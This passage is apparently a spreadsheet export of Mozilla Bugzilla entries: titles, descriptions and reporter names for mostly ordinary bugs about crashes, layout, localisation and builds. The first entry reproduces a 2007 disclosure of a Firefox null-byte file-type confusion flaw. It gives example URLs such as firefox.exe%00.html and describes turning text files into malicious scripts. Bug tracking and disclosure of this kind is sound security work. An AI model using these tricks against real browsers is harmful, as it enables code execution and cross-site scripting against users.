    <t>File type confusion vulnerability due to null bytes in URL (encoded as %00)</t>
  </si>
  <si>
    <t>Posted on 0x000000.com by Ronald van den Heetkamp
Firefox Remote &amp; Local Code Excution 0day.
I found this vulnerability in Firefox moments ago while I was playing with the urlbar.
It seems Firefox is vulnerable to null byte file type corruption. It is possible to execute files as a different filetype and trick Firefox into executing it. Is this dangerous? yeah it's pretty bad.
Pointers that are vulnerable:
file:///
resource:
Use:
[uri]/[filelocation]/[file][.ext]%00[.ext]
Example:
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html
or:
resource:///README.txt%00.html
More filetypes:
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.js
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.pdf
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.doc
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xls
probably every filetype.
Oh and: file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xpi :)
This could lead to various exploits to name a few:
- Dossing a user the above example does it almost.
- Code execution
- File access
- Trojan activation
- Virus activation
- Reflective Cross Site Scripting (RXSS)
- Cross Site Request Forgeries (CSRF)
Another example
It is possible to turn regular .txt stored files into full Javascript html zombies:
file:///[filelocation]/troy.txt%00.html
troy.txt could contain:
/*
Bunch of malicious Javascript
*/
Or:
Well I guess you get the point: nasty.
Posted on 06 06 07 by 0x000000</t>
  </si>
  <si>
    <t>CORE-451124</t>
  </si>
  <si>
    <t>Fix vertical alignment of context menu submenus</t>
  </si>
  <si>
    <t>Created attachment 334373
fix
On Mac OS X native context menus are vertically offset by -4px. We should do the same it looks better especially when opening sub menus.</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-410989</t>
  </si>
  <si>
    <t>Remember password feature is not filling in properly</t>
  </si>
  <si>
    <t>From https://labs.mozilla.com/forum/index.php/topic447.0.html
The password and passphrase are stored correctly in the password manager but they do not automatically fill in on first use each day. My guess is that this may be a JavaScript conflict with the extension noscript.</t>
  </si>
  <si>
    <t>CORE-473273</t>
  </si>
  <si>
    <t>non-immediate DOM changes to filters don't work</t>
  </si>
  <si>
    <t>Created attachment 356632
testcase
This may be related to or even a duplicate of bug 463939
The filter does not repaint itself possibly because DoApplyRenderingChangeToTree in nsCSSFrameConstructor does nothing for SVG frames but even if that is fixed the repaint does nothing as the filter invalidation BBox is empty.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-527131</t>
  </si>
  <si>
    <t>da / Danish</t>
  </si>
  <si>
    <t>Fennec: Extensions panel is not fully localized into Danish</t>
  </si>
  <si>
    <t>In multi-locale for Fennec's beta 5 the Extensions panel says Search Catalog as the text in the search box and Update on the update button at the top right.
Build id: Mozilla/5.0 (X11 U Linux armv7l Nokia N900 da rv:1.9.2b2pre)
Gecko/20091106 Firefox/3.6b2pre Fennec/1.0b5
Steps to Reproduce:
1. Open a multi-locale version of Fennec
2. Click on Options -&gt; Preferences -&gt; Languages
3. Select Dansk and restart
5. In the right panel click on the options button
6. Click on the extensions button
Actual Results:
English can be seen in the search box and on the update button.
Expected Results:
Extensions button should not have English in the search box or the update button.</t>
  </si>
  <si>
    <t>CORE-177780</t>
  </si>
  <si>
    <t>reduce copying in expat</t>
  </si>
  <si>
    <t>The Expat project at SF has a nice performance patch:
http://sourceforge.net/tracker/index.php?func=detail&amp;aid=600964&amp;group_id=10127&amp;atid=310127
The above is the explanation the patch is here:
http://sourceforge.net/tracker/download.php?group_id=10127&amp;atid=310127&amp;file_id=29910&amp;aid=600964</t>
  </si>
  <si>
    <t>CORE-317549</t>
  </si>
  <si>
    <t>Crash [@ nsCSSFrameConstructor::ContentInserted] [@ PresShell::ContentInserted] involving MathML</t>
  </si>
  <si>
    <t>nextSibling-&gt;GetParent() appears to be returning a freed object. Confirming it happens on the 1.5 branch as well.</t>
  </si>
  <si>
    <t>CORE-837981</t>
  </si>
  <si>
    <t>Remove GetDeflatedStringLength().</t>
  </si>
  <si>
    <t>GetDeflatedStringLength() is trivial and can be inlined.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-373385</t>
  </si>
  <si>
    <t>Wrong layout when logging in and then maximizing the window (AKA iframes not yet to be the win)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a3pre) Gecko/20070309 Minefield/3.0a3pre
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a3pre) Gecko/20070309 Minefield/3.0a3pre
I suspect a script is used to get the client's window width and height and adapt the site's layout to them? If so then it somewhat fails to adapt when the window is maximized. This essentially affects the iframe and the footer (small iframe / big footer).
Reproducible: Always
Steps to Reproduce:
1. Resize your browser (not too small - look at the first screenshot)
2. Connect to http://preview.addons.mozilla.org
3. Log in and click Developer Tools
4. Maximize
Actual Results:  
The site doesn't look as if you had clicked Developer Tools from a maximized window.
Expected Results:  
The site is looking good :)</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-240780</t>
  </si>
  <si>
    <t>Default assignees and QA contacts full of formerly-netscape.com.tld addresses</t>
  </si>
  <si>
    <t>There are quite a few components that have addresses in
formerly-netscape.com.tld for their default assignees and QA contacts.  As we
all know these refer to people who aren't around anymore and are not real email
addresses.
This means surely that bugs in these components are not been quality assured
by anybody.  It would make sense to change the contacts for these bugs except
that we don't know whom to change them to.
These assignees and QA contacts should be changed to appropriate people who are
still here and in a position to take on the duties.
I've put in the URL for MailNews as there are lots of them there however
components in all products should be checked.</t>
  </si>
  <si>
    <t>smjg</t>
  </si>
  <si>
    <t>CORE-384473</t>
  </si>
  <si>
    <t>table overlaying table on Nascar.com</t>
  </si>
  <si>
    <t>For a good while now all the head2head columns on Nascar.com are all screwed up and the right portion of the screen is unreadable due to a table overlaying a table (I guess that is how you would describe it). 
Link: http://www.nascar.com/2007/news/features/06/13/dearnhardtjr.head2head.jpate.maumann/index.html
This maybe related also (the special notice on the left hand side which has been like this for months on this site):
https://www.usaa.com/inet/ent_logon/Logon</t>
  </si>
  <si>
    <t>BUGZILLA-204106</t>
  </si>
  <si>
    <t>enter bug form should indicate which fields are required/mandatory</t>
  </si>
  <si>
    <t>The enter bug form doesn't say which fields are required/mandatory and which
are not.  It should so users don't have to submit the form to find out this
information.</t>
  </si>
  <si>
    <t>CORE-291321</t>
  </si>
  <si>
    <t>German character  and surrogate pair characters can not be rendered using proper font</t>
  </si>
  <si>
    <t>When the text style is small-caps and two 'S' are rendered for  first
'S' is not rendered using small-caps font. However the case of  follows
lower-case character or it is selected 'S' is rendered using small-caps font.
I think that first 'S' should be always rendered using small-caps font.</t>
  </si>
  <si>
    <t>hsaito54</t>
  </si>
  <si>
    <t>CORE-161644</t>
  </si>
  <si>
    <t>Mozilla crashes in a specific site [@ nsBlockFrame::PullFrameFrom][@ nsLineBox::GetCombinedArea][@ nsPluginHostImpl::AddInstanceToActiveList]</t>
  </si>
  <si>
    <t>Whenever I tried to go to the following URL:
http://homepages.pathfinder.gr/lefteris_paliginis/Dia8hkhPromh8ea/HDia8hkhToyPromh8ea.html
mozilla program crashed while loading. I'm using:
Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.1b) Gecko/20020721
but I've noticed that Netscape 7.0pr1 with version:
Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.0rc2) Gecko/20020512
Netscape/7.0b1
has also the same problem meaning that older versions of mozilla are also affected.</t>
  </si>
  <si>
    <t>P.Kavalagios</t>
  </si>
  <si>
    <t>CORE-389933</t>
  </si>
  <si>
    <t>ASSERTION: JoinNode called with node not listed in offset table while editing HTML email in GMail</t>
  </si>
  <si>
    <t>###!!! ASSERTION: JoinNode called with node not listed in offset table.: '0' file /Users/roc/mozilla-checkin/mozilla/editor/txtsvc/src/nsTextServicesDocument.cpp line 2630
This assertion fires on and off when I edit HTML email in GMail.
I wonder if it's associated with extremely frequent crashes I'm getting using GMail on latest (2-day-old) trunk.</t>
  </si>
  <si>
    <t>BUGZILLA-70907</t>
  </si>
  <si>
    <t>QuickSearch: port the JS code to perl (make it server-side)</t>
  </si>
  <si>
    <t>Currently QuickSearch is a client-site JavaScript-based tool. Porting it to perl
and turning it into a server-side tool would have two benefits:
- it could be used with JS turned off
- a bookmarklet could be created to provide QuickSearch functionality
- the ugly hack with the hardcoded keywords could be removed
It would make development a little harder because you'd have to change the
server or setup your own each time you want to test a little change but I
think it's worth it.</t>
  </si>
  <si>
    <t>CORE-429020</t>
  </si>
  <si>
    <t>Scrollbars jump when being clicked and held to scroll down page.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.4 en-US rv:1.9b5) Gecko/2008032619 Firefox/3.0b5
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.4 en-US rv:1.9b5) Gecko/2008032619 Firefox/3.0b5
If you scroll to a middle of the page (so the scroll bar is half way down) and click and hold the scroll bar the page will immediately jump up. When you pull the scroll bar down (still holding the mouse) it will jump back to where it was originally and start scrolling smoothly.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>hyperpal</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-247339</t>
  </si>
  <si>
    <t>Pages with RSS feed should contain an autodiscovery header link tag.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040614 Firefox/0.9
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040614 Firefox/0.9
The pages with RSS pages (Newest/Most popular etc.) should contain the
Autodiscovery metatag as defined here:
http://diveintomark.org/archives/2002/05/30/rss_autodiscovery
They should also at the very least contain a link to the RSS feed instead of
being buried in the FAQ.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>aquarion</t>
  </si>
  <si>
    <t>CORE-288392</t>
  </si>
  <si>
    <t>DOMSubtreeModified event does not fire at all</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 .NET CLR 1.0.3705 .NET CLR 1.1.4322)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
In no situation I have tried (many) does the DOMSubtreeModified event fire.
According to page 27 of the DOM2 Events Module:
This is a general event for notification of all changes to the document. It 
can be used instead of the more specific events listed below. 
[ ...  ...]
The target of this event is the lowest common parent of the changes which have 
taken place. This event is dispatched after any other events caused by the 
mutation have fired.
For me this means that EVERY modification of the subtree including node 
replacement removing/adding nodes changing attributes ... should fire it. As 
said in the spec it also should be fired together with one of the 
events listed below:
 - DOMNodeInserted
 - DOMNodeRemoved
 - DOMNodeRemovedFromDocument
 - DOMNodeInsertedInDocument
 - DOMAttrModified
 - DOMCharacterDataModified
Once this works the entire Mutations (1.6.4) section will work in Mozilla 
possibly passing the entirety of section 1.6 (Event Modules)?
Reproducible: Always
Steps to Reproduce:
1.Attach an event listener to any node in a document.
2.Change any aspect of any node under the node being 'listened to'.
Actual Results:  
1.Attach an event listener to any node in a document.
2.Change any aspect of any node under the node being 'listened to'. For 
example change an attribute value.
3.DOMAttrModified fires.
Thats it ...
Expected Results:  
1.Attach an event listener to any node in a document.
2.Change an attribute value.
3.DOMAttrModified fires.
4.DOMSubtreeModified fires.</t>
  </si>
  <si>
    <t>andrew.halliday</t>
  </si>
  <si>
    <t>CORE-439354</t>
  </si>
  <si>
    <t>OS X toolbar background doesn't have a good gradient</t>
  </si>
  <si>
    <t>Created attachment 325196
Thunderbird toolbar background [wrong]
Compare the two attachments.</t>
  </si>
  <si>
    <t>CORE-206027</t>
  </si>
  <si>
    <t>Cut n paste from Powerpoint into mail compose does not work.</t>
  </si>
  <si>
    <t>About to attach a patch from Harish that fixes the problem.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-840631</t>
  </si>
  <si>
    <t>DCOps</t>
  </si>
  <si>
    <t>Replace RAM in vm1-2.phy.labs.scl3.mozilla.com</t>
  </si>
  <si>
    <t>Machine paniced and on reboot the BIOS alerted:
Un-Correctable DRAM ECC Error Detected at CPU02/DIMM1B
That RAM stick needs replacing.</t>
  </si>
  <si>
    <t>server-ops-dcops</t>
  </si>
  <si>
    <t>SEAMONKEY-215977</t>
  </si>
  <si>
    <t>Tooltips corrupt display of text underneath</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4) Gecko/20030624
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4) Gecko/20030624
In the page linked below a tooltip appears on mouseover for the sure have
link (mid-page).  When the tooltip disappears the text that was underneath the
tooltip
appears corrupted (until refreshed).
Reproducible: Always
Steps to Reproduce:
1. See Details section above.
2.
3.</t>
  </si>
  <si>
    <t>jspaar</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-461020</t>
  </si>
  <si>
    <t>Need a stack trace to aid debugging</t>
  </si>
  <si>
    <t>When speculative script parsing (bug 364315) landed we started seeing intermittent orange on the Talos boxes due to crashes during Tp. Eventually I disabled speculative parsing so that the trees would be green for beta1. However it would be nice to re-enable speculative parsing.
The problem is that it isn't at all clear why the Talos boxes are crashing. As far as I know nobody reported any speculative parsing related crashes or was able to reproduce the crashiness. I did try to install standalone Talos however I was unable to reproduce the crash with the regular pageset and installing the full pageset into my standalone talos caused it to not work at all (as far as I could tell the browser refused to start at all becoming a defunct process immediately).
I was able to hack something up to run through the pageset but after ~40 cycles across 4 machines I crashed only once in seemingly unrelated code.
It would be really nice if I could get some sort of crash stack for the crashes that Talos is seeing so I could direct my debugging efforts directly at the problems that Talos is running into (instead of staring at the code trying to come up with any possible problem).
If you need any other information please ask.</t>
  </si>
  <si>
    <t>CORE-474441</t>
  </si>
  <si>
    <t>Move the marquee reftests into the marquee reftests folder</t>
  </si>
  <si>
    <t>Created attachment 357804
patch
There are some reftests that test marquees in the bugs subfolder.
I think it makes sense to move those in the marquee folder.
That way when you make changes to the xbl-marquee.xml file (the marquee binding file) you can easily test those by doing only the tests in that folder.
Good idea or bad idea?</t>
  </si>
  <si>
    <t>MARKETING-275426</t>
  </si>
  <si>
    <t>Enthusiastic FireFox Chatting Forum</t>
  </si>
  <si>
    <t>I own the domain FireFoxForum.com.  My idea was to develop it into something
where people can just talk about FireFox and how much they love it.  The idea
was to have people come tell other web developers / normal people about addons
that they love / enjoy and just generally talk about FireFox.  Yes the logo is
being used in the header and I was unaware that this is illegal along with the
domain without your permission.  Would it be possible to get your permission to
run this site?  I also would add text to the site that states that it is no way
affiliated with mozilla.  I would just like permission to run the site.
Thanks in advance
Ryan Amos</t>
  </si>
  <si>
    <t>WhSox21</t>
  </si>
  <si>
    <t>SEAMONKEY-221165</t>
  </si>
  <si>
    <t>does not report new (POP) mail at startup or periodically (dead biff)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6a) Gecko/20031003
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6a) Gecko/20031003
this release does not check for mail on startup.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
Expected Results:  
it should check for mail on startup.</t>
  </si>
  <si>
    <t>bugzilla41</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-115064</t>
  </si>
  <si>
    <t>Tarantella.com -  pages won't load - gives file missing error</t>
  </si>
  <si>
    <t>Sorry for the vague description here but if you go to any tarantella server
(the above is a free online demo) Mozilla [Linux 2001121206 and previous] will
not load the leftmost frame (Java Required).  Instead Tarantella reports a
missing file.  However this works correctly with Netscape 4 IE 5 &amp; 6 and
Konqueror (iirc).  The rewritten URL (once you log in) is
http://tarantella.allegrix.net/cgi-bin/ttawebtop.cgi/resources/webtops/sco/tta/demowebtop/locale=en-us/?no=10&amp;ts=Thu+Dec+13+10%3A11%3A56+EST+2001
and I can verify on my own system that this does indeed exist.  The URL that
appears in Netscape 4.77 starts with
http://tarantella.allegrix.net/cgi-bin/ttawebtop.cgi/resources/webtops/sco/tta/demowebtop/locale=en-us/left.html?</t>
  </si>
  <si>
    <t>ccurtis0</t>
  </si>
  <si>
    <t>THUNDERBIRD-291870</t>
  </si>
  <si>
    <t>Unable to lock secure connection SMTP setting</t>
  </si>
  <si>
    <t>Enterprise folks cannot lock the account manager smtp server setting for the
type of secure connection to be used.
The SSL radio button in that radio group is never disabled.</t>
  </si>
  <si>
    <t>NSS-126289</t>
  </si>
  <si>
    <t>SSL client dies in handshake code</t>
  </si>
  <si>
    <t>This occurred running my httptest client with NSS 3.3.2 with double-handshake
client auth . I have the core file.
detected a multithreaded program
t@64 (l@58) terminated by signal ABRT (Abort)
Current function is PR_Assert
  495       abort()
(dbx) where
current thread: t@64
  [1] __sigprocmask(0x0 0xfdab1210 0x0 0x0 0x0 0x0) at 0xfec39bf0
  [2] _resetsig(0xfec3c510 0x0 0x0 0xfdab1d78 0xfec4e000 0x0) at 0xfec2e620
  [3] _sigon(0xfdab1d78 0xfec55990 0x6 0xfdab12e4 0xfdab1d78 0xfdab1328)
at 0xfec2dd10
  [4] _thrp_kill(0x0 0x40 0x6 0xfec4e000 0x40 0xfebba428) at 0xfec30e84
  [5] raise(0x6 0x0 0x0 0xffffffff 0xfebba394 0xfee6b6dc) at 0xfeb49b08
  [6] abort(0xfebb6000 0x3f 0xfebbd99c 0xfebb9c78 0x7b 0xfeb91c94) at
0xfeb35124
=&gt;[7] PR_Assert(s = 0xff316418 !ssl_HaveXmitBufLock(ss) file = 0xff316434
sslsecur.c ln = 123) line 495 in prlog.c
  [8] ssl_Do1stHandshake(ss = 0xd3dc750) line 123 in sslsecur.c
  [9] ssl_SecureSend(ss = 0xd3dc750 buf = 0xa2e68 GET / HTTP/1.0\n\n len =
16 flags = 0) line 1075 in sslsecur.c
  [10] ssl_Send(fd = 0x19c138 buf = 0xa2e68 len = 16 flags = 0 timeout =
360000000U) line 1192 in sslsock.c
  [11] PR_Send(fd = 0x19c138 buf = 0xa2e68 amount = 16 flags = 0 timeout =
360000000U) line 221 in priometh.c
  [12] SunRequest::send(this = 0x1c21c8 sock = 0x19c138) line 308 in request.cpp
  [13] SunEngine::makeRequest(this = 0xfdab1b64 request = CLASS server =
CLASS ignoresenderror = 1) line 413 in engine.cpp
  [14] SunTest::run(this = 0xd3758) line 454 in tests.cpp
  [15] TestInstance::execute_test(this = 0xd3708) line 152 in tests.cpp
  [16] thread_entry(arg = (nil)) line 1684 in tests.cpp
  [17] _pt_root(arg = 0xf1380) line 214 in ptthread.c
(dbx)</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-385821</t>
  </si>
  <si>
    <t>Product pages have different copyright information than normal pages</t>
  </si>
  <si>
    <t>During testing I noticed that this page-&gt;http://ko.www.mozilla.com/ko/firefox/2.0.0.4/whatsnew/ does not contain the same copyright information as other pages seen on mozilla.com. en-US says Copyright Â© 2005â€“2007 Mozilla. All rights reserved but the page above leaves out the All rights reserved. Is there any specific reason for this? Just wanting to make sure we are consistent across the board or there may be a reason this is left off.</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-437663</t>
  </si>
  <si>
    <t>StringObject malformed when ByteArray is not aligned.</t>
  </si>
  <si>
    <t>String::newPoolString creates a malformed StringObject if the source ByteArray is not 8-byte aligned (i.e. bottom three bits are zero). StringObject uses the low 3 bits for flags so the address must be 8-byte aligned otherwise the result of calling String::getData() is incorrect.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-471661</t>
  </si>
  <si>
    <t>Try server mac slave needs CFLAGS changed from -gstabs --save-temps to -gdwarf-2</t>
  </si>
  <si>
    <t>Lately its not possible to create a tryserver build with the mac builder. The build process stops with the following error:
/Developer/SDKs/MacOSX10.4u.sdk/usr/include/sys/_types.h:173: error: expected Ã¢â‚¬ËœÃ¢â‚¬â„¢ at end of input
/Developer/SDKs/MacOSX10.4u.sdk/usr/include/sys/_types.h:173: error: expected `' at end of input
/Developer/SDKs/MacOSX10.4u.sdk/usr/include/sys/_types.h:173: error: expected `}' at end of input
See the given full log at:
http://tinderbox.mozilla.org/showlog.cgi?log=MozillaTry/1230715879.1230722032.25889.gz&amp;fulltext=1</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-968156</t>
  </si>
  <si>
    <t>Gaia::Search</t>
  </si>
  <si>
    <t>Store multiple icons from mozbrowsericonchange events</t>
  </si>
  <si>
    <t>We should be storing different icons that we receive on mozbrowsericonchange event so that we can later select the best icon to show in different scenarios.</t>
  </si>
  <si>
    <t>sergi.mansilla</t>
  </si>
  <si>
    <t>CORE-197146</t>
  </si>
  <si>
    <t>Allow users of regxpcom to not register the contents of the components directory</t>
  </si>
  <si>
    <t>Just wondering if an option to regxpcom to not manifest the contents of the
components directory would be useful.
We would have:
- register components by default
- register another directory (or set of directories) and components
- register another directory only
- save the result to a particular registry filename
- applications may specify which registry file to use.</t>
  </si>
  <si>
    <t>DIRECTORY-396745</t>
  </si>
  <si>
    <t>LDAP XPCOM SDK</t>
  </si>
  <si>
    <t>nsILDAPConnection::Init should take an nsILDAPURL as a parameter instead of three others.</t>
  </si>
  <si>
    <t>Created attachment 281500
The fix (diff -w)
Currently nsILDAPConnection::Init takes a host port and SSL (true/false) as parameters (as well as other things).
Everywhere we use the function we're extracting the host port and SSL from a nsILDAPURL and passing it to nsILDAPConnection::Init.
nsILDAPConnection::Init should just take a nsILDAPURL and do the extraction itself.
diff -w patch attached I'll attach the non -w one in a moment.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-261474</t>
  </si>
  <si>
    <t>Netscape bookmark file containing javascript can't be imported.</t>
  </si>
  <si>
    <t>When Bookmarklet of URL is Import following bookmark is not import normally.
  -- &lt;A HREF=javascript:var bsetPartialSource = ...
  -- &lt;A HREF=javascript:var bsetLinkTag = ...
In Windows branch/trunk Firefox it has Imported satisfactory.
Mac OS X 10.3.5
2004092500 (v0.8+)</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-256141</t>
  </si>
  <si>
    <t>[german help] Translate shortcuts-navigator.xhtml</t>
  </si>
  <si>
    <t>CORE-411379</t>
  </si>
  <si>
    <t>Add SSE2 processing for JPEG color use static instead of dynamic arrays</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.11) Gecko/20080101 BonEcho/2.0.0.11 (mmoy CE K8C-X03)
Build Identifier: Trunk
Add SSE2 optimization for ycc_rgb_convert and turn five dynamic tables into static tables. ycc_rgb_convert is a common color conversion and using SSE2 code instead of scalar code results in about a 25% performance improvement in my testing.
There are four tables that are generated in the jdcolor.c module every time an image is processed. The change here uses a static table instead of going through malloc computation and free each time.
There is a table called range_limit that's created for every image and this is done in jdmaster.c. The change here changes that to a static table instead of creating it for every image.
The SSE2 code and the table code are only varianted on Win32 builds built with MSVC. The SSE2 code will only run on processors that support it but that should be most processors in the last six years.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
This code piggybacks on the HAVE_SSE2_INTEL_MNEMONICS define variable and the SSE2Available global that's in the existing SSE2 JPEG code for the Inverse Discrete Cosign Transform.
This code was ported from my Mac OSX code by changing the alignment declarations from GNU style to MSVC style. Most of the changes in this patch should work on Mac OSX Intel and Linux with minor modifications.</t>
  </si>
  <si>
    <t>mmoy</t>
  </si>
  <si>
    <t>CORE-484861</t>
  </si>
  <si>
    <t>removal of JSObjectOps.set(Parent|Proto)</t>
  </si>
  <si>
    <t>Currently the only users of JSObjectOps.set(Parent|Proto) is the debug-only code in JS_Set(Parent|Proto). With the bug 437325 fixed that would be removed. Thus I suggest to remove these 2 fields from JSObjectOps.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-270798</t>
  </si>
  <si>
    <t>ASSERTION: getElementById() fix caller?: '!aId.IsEmpty()' @onLocationFound</t>
  </si>
  <si>
    <t>###!!! ASSERTION: getElementById() fix caller?: '!aId.IsEmpty()' file
r:/mozilla/content/xul/document/src/nsXULDocument.cpp line 1732
Break: at file r:/mozilla/content/xul/document/src/nsXULDocument.cpp line 1732
0 [native frame]
1 onLocationFound(window = [object ChromeWindow @ 0x2fd7f28] container =
[object XULElement @ 0x385
ec50]) [chrome://venkman/content/view-manager.js:873]
    content = [object XULElement @ 0x3452798]
    beforeNode = undefined
    gutterContainer = undefined
    this = [object ChromeWindow @ 0x2fd7f28]
2 onWindowLoaded(window = [object ChromeWindow @ 0x2fd7f28])
[chrome://venkman/content/view-manager
.js:660]
    container = [object XULElement @ 0x385ec50]
    this = [object ChromeWindow @ 0x2fd7f28]
3 vmgr_ensurelocation(cb = [function] parsedLocation = [object Object])
[chrome://venkman/content/
view-manager.js:672]
    viewManager = [object Object]
    onWindowLoaded = [function]
    window = [object ChromeWindow @ 0x2fd7f28]
    this = [object Object]
4 vmgr_move(height = undefined width = undefined parsedLocation = [object
Object] viewId = sessi
on) [chrome://venkman/content/view-manager.js:961]
    viewManager = [object Object]
    moveContent = [function]
    onLocationFound = [function]
    view = [object Object]
    currentContent = [object XULElement @ 0x3452798]
    this = [object Object]
5 vmgr_dewdropinn(sourceView = [object Object] targetView = [object Object]
direction = right) [
chrome://venkman/content/view-manager.js:1636]
    reparent = [function]
    destContainer = [object XULElement @ 0x385ec50]
    destBefore = undefined
    currentContent = [object XULElement @ 0x34ec8e8]
    currentContainer = [object XULElement @ 0x33dec28]
    parentType = vertical
    dest = [object Object]
    parsedTarget = x-vloc:/mainwindow/gutter?target=view&amp;id=windows&amp;before=source2
    viewManager = [object Object]
    this = [object Object]
6 callProcessDrop(116) [chrome://venkman/content/view-manager.js:1469]
    this = [object ChromeWindow @ 0x2fd7f28]
7 [native frame]
my guess is that
1635     dest.before = destBefore ? destBefore.getAttribute(id) : null
took the ? path on a id-less node</t>
  </si>
  <si>
    <t>TOOLKIT-374813</t>
  </si>
  <si>
    <t>Remove rsync usage and fix permissions issues when uploading windows symbols.</t>
  </si>
  <si>
    <t>Created attachment 259243
Use scp and zip rev. 1
Two issues to fix here:
1) MozillaBuild doesn't come with rsync. Using scp is just as good.
2) When tarring a file within MSYS it always has permissions rwxr-xr-x. This is undesirable because when we unpack we probably want rwxrwxr-x and I can't figure out a way to suppress saving the mode information. If we use zip instead of tar we can avoid this entirely.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-197446</t>
  </si>
  <si>
    <t>Start building os2Embed</t>
  </si>
  <si>
    <t>Start building embedding/tests/os2Embed. Currently os2Embed is not part of the
build.</t>
  </si>
  <si>
    <t>jblanco</t>
  </si>
  <si>
    <t>BUGZILLA-365442</t>
  </si>
  <si>
    <t>If product/component does not have any flags Flags: / Requestee: header should not be shown on the bug creation form</t>
  </si>
  <si>
    <t>On show_bug.cgi the Flags: header is only shown if there are flags available for use. The same does not hold true for enter_bug.cgi. enter_bug.cgi should only show the header if there are flags that can be used.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-264602</t>
  </si>
  <si>
    <t>Fx0.90.10/Tb0.70.8 compatible extensions that are compatible with Fx 1.0/Tb 0.9</t>
  </si>
  <si>
    <t>This bug is a list of extensions that were compatible with 0.9 and 0.10 that are
also compatible with the 1.0 This bug also handles Thunderbird 0.9 compatible
extension MaxAppVer updates.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-286881</t>
  </si>
  <si>
    <t>In  2 Warning: trailing comma is not legal in ECMA-262 object initializers</t>
  </si>
  <si>
    <t>[Mozilla Thunderbird version 1.0+ (20050319)] (nightly) (W98SE)
{{
Warning: trailing comma is not legal in ECMA-262 object initializers
Source File: file:///W:/PROGRAM%20FILES/MOZILLA%20THUNDERBIRD/components/newsblog.js
Line: 281
Source Code:
}
Warning: trailing comma is not legal in ECMA-262 object initializers
Source File: file:///W:/PROGRAM%20FILES/MOZILLA%20THUNDERBIRD/components/newsblog.js
Line: 361 Column: 2
Source Code:
  }
}}
when starting TB.</t>
  </si>
  <si>
    <t>BUGZILLA-237864</t>
  </si>
  <si>
    <t>Can't locate Token.pm in @INC when trying to log in</t>
  </si>
  <si>
    <t>This is a regression from the bug 192516 checkin.  I missed some occurances of
Token.</t>
  </si>
  <si>
    <t>THUNDERBIRD-281880</t>
  </si>
  <si>
    <t>Solaris bustage @nsMessenger.cpp:2178</t>
  </si>
  <si>
    <t>nsMessenger.cpp line 2178: Error: Cannot use const char* to initialize char*.
The line 2178 is:
  char * partId = strstr(aAttachmentUrl partIdPrefix)
changing it to either
  char * partId = (char *)strstr(aAttachmentUrl partIdPrefix)
or
  char * partId = PL_strstr(aAttachmentUrl partIdPrefix)
fixed it.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-524011</t>
  </si>
  <si>
    <t>[AMO] Increase innodb_buffer_pool</t>
  </si>
  <si>
    <t>From bug 522112 comment 0:
&gt; Per recommendation from Percona our addons DB would perform best with at least
&gt; 10 GB of innodb_buffer_pool and at least a few gigs of index cache.  To achieve
&gt; this we need to get all of the servers up to 16 GB of RAM.
We have the RAM now let's use it. :)</t>
  </si>
  <si>
    <t>CORE-129496</t>
  </si>
  <si>
    <t>JS object initializer dynamic overhead (affects a DHTML test case)</t>
  </si>
  <si>
    <t>See attached e-mail conversation ...</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-298201</t>
  </si>
  <si>
    <t>[10.4] Tiger: Crash at [NSQuickDrawView dealloc]</t>
  </si>
  <si>
